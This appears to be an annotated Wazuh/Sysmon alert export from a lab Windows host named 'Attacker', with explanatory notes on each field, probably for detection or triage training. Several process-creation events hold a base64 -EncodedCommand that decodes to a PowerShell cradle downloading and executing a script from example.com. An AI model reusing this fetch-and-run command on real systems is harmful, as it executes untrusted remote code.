data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:39.8247444Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282076 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:39.810
ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00}
ProcessId: 12600
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dqe4bdg3.md4.ps1
CreationUtcTime: 2025-04-24 22:35:39.810
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:39.810 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcba-680a-a30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dqe4bdg3.md4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:39.810 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.923473 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:42.1700560Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282122 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:40.387
ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00}
ProcessId: 8756
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00}
ParentProcessId: 12600
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:40.387 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbc-680a-a70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8756 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.931539 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:42.3980110Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282123 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:42.368
ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00}
ProcessId: 8756
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_p2lp1iym.vuq.ps1
CreationUtcTime: 2025-04-24 22:35:42.368
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:42.368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbc-680a-a70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8756 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_p2lp1iym.vuq.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:42.368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.934303 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:44.7172103Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282169 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:43.049
ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00}
ProcessId: 11892
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00}
ParentProcessId: 8756
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:43.049 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbf-680a-a90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8756 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.942369 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:44.8784134Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282170 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:44.876
ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00}
ProcessId: 11892
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yefpwlal.rop.ps1
CreationUtcTime: 2025-04-24 22:35:44.876
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:44.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbf-680a-a90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yefpwlal.rop.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:44.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.945137 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
